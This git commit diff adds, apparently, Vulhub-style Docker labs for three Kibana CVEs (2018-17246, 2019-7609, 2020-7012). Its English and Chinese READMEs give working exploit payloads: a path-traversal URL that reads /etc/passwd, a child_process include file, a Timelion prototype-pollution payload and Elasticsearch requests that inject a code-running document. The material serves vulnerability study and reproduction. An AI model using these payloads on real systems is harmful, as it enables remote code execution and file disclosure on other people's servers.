first commit

kibana/CVE-2018-17246/README.md

@@ -0,0 +1,45 @@
+# Kibana Local File Inclusion (CVE-2018-17246)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+Kibana is an open source data visualization dashboard for Elasticsearch.
+
+Kibana versions before 6.4.3 and 5.6.13 contain an arbitrary file inclusion flaw in the Console plugin. An attacker with access to the Kibana Console API could send a request that will attempt to execute javascript code. This could possibly lead to an attacker executing arbitrary commands with permissions of the Kibana process on the host system.
+
+References:
+
+- <https://nvd.nist.gov/vuln/detail/CVE-2018-17246>
+- <https://www.cyberark.com/threat-research-blog/execute-this-i-know-you-have-it/>
+
+## Environment Setup
+
+Start the Kibana 5.6.12 and Elasticsearch 5.6.16:
+
+```
+docker compose up -d
+```
+
+After started the environment, the Kibana is listening on `http://your-ip:5106`.
+
+## Vulnerability Reproduction
+
+Send the following request to trigger a basic path traversal:
+
+```
+http://your-ip:5601/api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../etc/passwd
+```
+
+Though there is nothing response except a error message with the 500 status code, you can see the exception in the `docker compose logs`:
+
+![](1.png)
+
+File `/etc/passwd` is imported successfully.
+
+To exploit this vulnerability, you need to upload a JavaScript webshell to the machine where the Kibana is running, then include it.
+
+```js
+// docker compose exec kibana bash && echo '...code...' > /tmp/vulhub.js
+export default {asJson: function() {return require("child_process").execSync("id").toString()}}
+```
+
+![](2.png)

kibana/CVE-2018-17246/README.zh-cn.md

@@ -0,0 +1,42 @@
+# Kibana Local File Inclusion (CVE-2018-17246)
+
+Kibana 为 Elassticsearch 设计的一款开源的视图工具。其5.6.13到6.4.3之间的版本存在一处文件包含漏洞，通过这个漏洞攻击者可以包含任意服务器上的文件。此时，如果攻击者可以上传一个文件到服务器任意位置，即可执行代码。
+
+参考链接：
+
+- https://nvd.nist.gov/vuln/detail/CVE-2018-17246
+- https://www.cyberark.com/threat-research-blog/execute-this-i-know-you-have-it/
+- https://www.anquanke.com/post/id/168291
+
+## 环境搭建
+
+启动 Kibana 5.6.12 和 Elasticsearch 5.6.16 环境：
+
+```
+docker compose up -d
+```
+
+环境启动后，访问`http://your-ip:5106`即可看到Kibana的默认首页。
+
+## 漏洞复现
+
+直接访问如下URL，来包含文件`/etc/passwd`：
+
+```
+http://your-ip:5601/api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../etc/passwd
+```
+
+虽然在返回的数据包里只能查看到一个500的错误信息，但是我们通过执行`docker compose logs`即可发现，`/etc/passwd`已经成功被包含：
+
+![](1.png)
+
+所以，我们需要从其他途径往服务器上上传代码，再进行包含从而执行任意命令。比如，我们将如下代码上传到服务器的`/tmp/vulhub.js`：
+
+```js
+// docker compose exec kibana bash && echo '...code...' > /tmp/vulhub.js
+export default {asJson: function() {return require("child_process").execSync("id").toString()}}
+```
+
+成功包含并返回命令执行结果：
+
+![](2.png)

kibana/CVE-2018-17246/docker-compose.yml

@@ -0,0 +1,10 @@
+version: '2'
+services:
+ kibana:
+   image: vulhub/kibana:5.6.12
+   depends_on:
+    - elasticsearch
+   ports:
+    - "5601:5601"
+ elasticsearch:
+   image: vulhub/elasticsearch:5.6.16

kibana/CVE-2019-7609/README.md

@@ -0,0 +1,42 @@
+# Kibana Prototype Pollution Leads to Remote Code Execution (CVE-2019-7609)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+Kibana is an open source data visualization dashboard for Elasticsearch.
+
+Kibana versions before 5.6.15 and 6.6.1 contain an arbitrary code execution flaw in the Timelion visualizer. An attacker with access to the Timelion application could send a request that will attempt to execute javascript code. This could possibly lead to an attacker executing arbitrary commands with permissions of the Kibana process on the host system.
+
+References:
+
+- https://nvd.nist.gov/vuln/detail/CVE-2019-7609
+- https://research.securitum.com/prototype-pollution-rce-kibana-cve-2019-7609/
+- https://slides.com/securitymb/prototype-pollution-in-kibana/#/4
+
+## Setup
+
+Before you can setup the environment, you need to change `vm.max_map_count` to greater than 262144 in host server (not in the docker container):
+
+```
+sysctl -w vm.max_map_count=262144
+```
+
+Then, start the Kibana 6.5.4 and Elasticsearch 6.8.6:
+
+```
+docker compose up -d
+```
+
+## Vulnerability Reproduce
+
+After started the environment, the Kibana is listening on `http://your-ip:5106`. The prototype pollution is happens in Timeline visualizer, fill in following payload here:
+
+```
+.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("/bin/touch /tmp/success");process.exit()//')
+.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')
+```
+
+![](1.png)
+
+Then, visit "Canvas" page to trigger the command `/bin/touch /tmp/success`. The file `/tmp/success` is created successfully:
+
+![](2.png)

kibana/CVE-2019-7609/README.zh-cn.md

@@ -0,0 +1,40 @@
+# Kibana 原型链污染导致任意代码执行漏洞 (CVE-2019-7609)
+
+Kibana 为 Elassticsearch 设计的一款开源的视图工具。其5.6.15和6.6.1之前的版本中存在一处原型链污染漏洞，利用这个漏洞我们可以在目标服务器上执行任意JavaScript代码。
+
+参考链接：
+
+- https://nvd.nist.gov/vuln/detail/CVE-2019-7609
+- https://research.securitum.com/prototype-pollution-rce-kibana-cve-2019-7609/
+- https://slides.com/securitymb/prototype-pollution-in-kibana/#/4
+
+## 漏洞环境
+
+启动环境前，需要先在Docker主机上执行如下命令，修改`vm.max_map_count`配置为262144：
+
+```
+sysctl -w vm.max_map_count=262144
+```
+
+之后，执行如下命令启动Kibana 6.5.4和Elasticsearch 6.8.6：
+
+```
+docker compose up -d
+```
+
+环境启动后，访问`http://your-ip:5601`即可看到Kibana页面。
+
+## 漏洞复现
+
+原型链污染发生在“Timeline”页面，我们填入如下Payload：
+
+```
+.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("/bin/touch /tmp/success");process.exit()//')
+.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')
+```
+
+![](1.png)
+
+成功后，再访问“Canvas”页面触发命令`/bin/touch /tmp/success`，可见`/tmp/success`已成功创建：
+
+![](2.png)

kibana/CVE-2019-7609/docker-compose.yml

@@ -0,0 +1,10 @@
+version: '2'
+services:
+ kibana:
+   image: vulhub/kibana:6.5.4
+   depends_on:
+    - elasticsearch
+   ports:
+    - "5601:5601"
+ elasticsearch:
+   image: vulhub/elasticsearch:6.8.6

kibana/CVE-2020-7012/README.md

@@ -0,0 +1,131 @@
+# Kibana 7.6.2 upgrade-assistant-telemetry Prototype Pollution Leads to RCE (CVE-2020-7012)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+Kibana is an open source data visualization dashboard for Elasticsearch.
+
+Kibana versions between 6.7.0 to 6.8.8 and 7.0.0 to 7.6.2 contain a prototype pollution flaw in the Upgrade Assistant. An authenticated attacker with privileges to write to the Kibana index could insert data that would cause Kibana to execute arbitrary code. This could possibly lead to an attacker executing code with the permissions of the Kibana process on the host system.
+
+References:
+
+- <https://hackerone.com/reports/852613>
+- <https://discuss.elastic.co/t/elastic-stack-6-8-9-and-7-7-0-security-update/235571>
+
+## Setup
+
+Start Kibana 7.6.2 and Elasticsearch 7.6.2 using Docker:
+
+```bash
+docker compose up -d
+```
+
+Once the environment is running, Kibana will be accessible at `http://your-ip:5601`.
+
+## Vulnerability Reproduction
+
+The remote code execution occurs when Kibana reading the `upgrade-assistant-telemetry` attribute of the saved object from Elasticsearch. So you can exploit this vulnerability by sending data directly to Elasticsearch or submitting queries through Kibana. Execution will occur either after Kibana is restarted or when data collection takes place (at an unknown time).
+
+To reproduce the vulnerability, first go to the developer tools of the Kibana UI (the URL is `http://your-ip:5601/app/kibana#/dev_tools/console`), then send the following request to modify Kibana mappings to allow the custom `upgrade-assistant-telemetry` document:
+
+```json
+PUT /.kibana_1/_mappings
+{
+  "properties": {
+    "upgrade-assistant-telemetry": {
+      "properties": {
+        "constructor": {
+          "properties": {
+            "prototype": {
+              "properties": {
+                "sourceURL": {
+                  "type": "text",
+                  "fields": {
+                    "keyword": {
+                      "type": "keyword",
+                      "ignore_above": 256
+                    }
+                  }
+                }
+              }
+            }
+          }
+        },
+        "features": {
+          "properties": {
+            "deprecation_logging": {
+              "properties": {
+                "enabled": {
+                  "type": "boolean",
+                  "null_value": true
+                }
+              }
+            }
+          }
+        },
+        "ui_open": {
+          "properties": {
+            "cluster": {
+              "type": "long",
+              "null_value": 0
+            },
+            "indices": {
+              "type": "long",
+              "null_value": 0
+            },
+            "overview": {
+              "type": "long",
+              "null_value": 0
+            }
+          }
+        },
+        "ui_reindex": {
+          "properties": {
+            "close": {
+              "type": "long",
+              "null_value": 0
+            },
+            "open": {
+              "type": "long",
+              "null_value": 0
+            },
+            "start": {
+              "type": "long",
+              "null_value": 0
+            },
+            "stop": {
+              "type": "long",
+              "null_value": 0
+            }
+          }
+        }
+      }
+    }
+  }
+}
+```
+
+Then send the second request to inject the malicious telemetry document:
+
+```json
+PUT /.kibana_1/_doc/upgrade-assistant-telemetry:upgrade-assistant-telemetry
+{
+  "upgrade-assistant-telemetry": {
+    "ui_open.overview": 1,
+    "ui_open.cluster": 1,
+    "ui_open.indices": 1,
+    "constructor.prototype.sourceURL": "\u2028\u2029\nglobal.process.mainModule.require('child_process').exec('touch /tmp/success')"
+  },
+  "type": "upgrade-assistant-telemetry",
+  "updated_at": "2020-04-17T20:47:40.800Z"
+}
+```
+
+![update kibana mappings](1.png)
+
+Finally, you need to wait for a while for your payload to execute. If you don't want to wait, you can restart the Kibana server by `docker compose restart kibana`, and the malicious code will be executed after the service restarts.
+
+As you can see, `touch /tmp/success` will be executed after the service restarts:
+
+![index doc status](2.png)
+
+> **Important note: After the exploitation, Kibana will crash and not able to start. You have to delete the `.kibana_1` index from ElasticSearch to restore the functionality.**

kibana/CVE-2020-7012/README.zh-cn.md

@@ -0,0 +1,129 @@
+# Kibana 7.6.2 upgrade-assistant-telemetry 原型污染导致远程代码执行 (CVE-2020-7012)
+
+Kibana 是 Elasticsearch 的开源数据可视化仪表盘工具。
+
+Kibana 6.7.0 至 6.8.8 版本以及 7.0.0 至 7.6.2 版本中的 Upgrade Assistant 功能存在原型污染漏洞。具有 Kibana 索引写入权限的认证用户可以插入恶意数据，导致 Kibana 执行任意代码。攻击者可能利用此漏洞以 Kibana 进程的权限在主机系统上执行代码。
+
+参考链接：
+
+- <https://hackerone.com/reports/852613>
+- <https://discuss.elastic.co/t/elastic-stack-6-8-9-and-7-7-0-security-update/235571>
+
+## 环境搭建
+
+使用 Docker 启动 Kibana 7.6.2 和 Elasticsearch 7.6.2：
+
+```bash
+docker compose up -d
+```
+
+环境启动后，Kibana 将监听在 `http://your-ip:5601`。
+
+## 漏洞复现
+
+远程代码执行漏洞发生在 Kibana 从 Elasticsearch 读取带有 `upgrade-assistant-telemetry` 属性的保存对象时。你可以通过直接向 Elasticsearch 发送数据或通过 Kibana 提交查询来利用此漏洞。代码执行将在 Kibana 重启后或数据收集时（具体时间未知）发生。
+
+首先进入 Kibana UI 的开发者工具（URL 为 `http://your-ip:5601/app/kibana#/dev_tools/console`），然后发送以下请求来修改 Kibana 映射，以允许自定义的 `upgrade-assistant-telemetry` 文档：
+
+```json
+PUT /.kibana_1/_mappings
+{
+  "properties": {
+    "upgrade-assistant-telemetry": {
+      "properties": {
+        "constructor": {
+          "properties": {
+            "prototype": {
+              "properties": {
+                "sourceURL": {
+                  "type": "text",
+                  "fields": {
+                    "keyword": {
+                      "type": "keyword",
+                      "ignore_above": 256
+                    }
+                  }
+                }
+              }
+            }
+          }
+        },
+        "features": {
+          "properties": {
+            "deprecation_logging": {
+              "properties": {
+                "enabled": {
+                  "type": "boolean",
+                  "null_value": true
+                }
+              }
+            }
+          }
+        },
+        "ui_open": {
+          "properties": {
+            "cluster": {
+              "type": "long",
+              "null_value": 0
+            },
+            "indices": {
+              "type": "long",
+              "null_value": 0
+            },
+            "overview": {
+              "type": "long",
+              "null_value": 0
+            }
+          }
+        },
+        "ui_reindex": {
+          "properties": {
+            "close": {
+              "type": "long",
+              "null_value": 0
+            },
+            "open": {
+              "type": "long",
+              "null_value": 0
+            },
+            "start": {
+              "type": "long",
+              "null_value": 0
+            },
+            "stop": {
+              "type": "long",
+              "null_value": 0
+            }
+          }
+        }
+      }
+    }
+  }
+}
+```
+
+然后发送第二个请求来注入恶意的 telemetry 文档：
+
+```json
+PUT /.kibana_1/_doc/upgrade-assistant-telemetry:upgrade-assistant-telemetry
+{
+  "upgrade-assistant-telemetry": {
+    "ui_open.overview": 1,
+    "ui_open.cluster": 1,
+    "ui_open.indices": 1,
+    "constructor.prototype.sourceURL": "\u2028\u2029\nglobal.process.mainModule.require('child_process').exec('touch /tmp/success')"
+  },
+  "type": "upgrade-assistant-telemetry",
+  "updated_at": "2020-04-17T20:47:40.800Z"
+}
+```
+
+![update kibana mappings](1.png)
+
+最后，你需要等待一段时间让 payload 执行。如果不想等待，可以通过 `docker compose restart kibana` 重启 Kibana 服务器，恶意代码将在服务重启后执行。
+
+如图所示，`touch /tmp/success` 将在服务重启后执行：
+
+![index doc status](2.png)
+
+> **重要提示：漏洞利用后，Kibana 将崩溃且无法启动。你需要从 ElasticSearch 中删除 `.kibana_1` 索引才能恢复功能。**

kibana/CVE-2020-7012/docker-compose.yml

@@ -0,0 +1,11 @@
+services:
+  kibana:
+    image: vulhub/kibana:7.6.2
+    depends_on:
+      - elasticsearch
+    ports:
+      - "5601:5601"
+  elasticsearch:
+    image: vulhub/elasticsearch:7.6.2
+    environment:
+      - discovery.type=single-node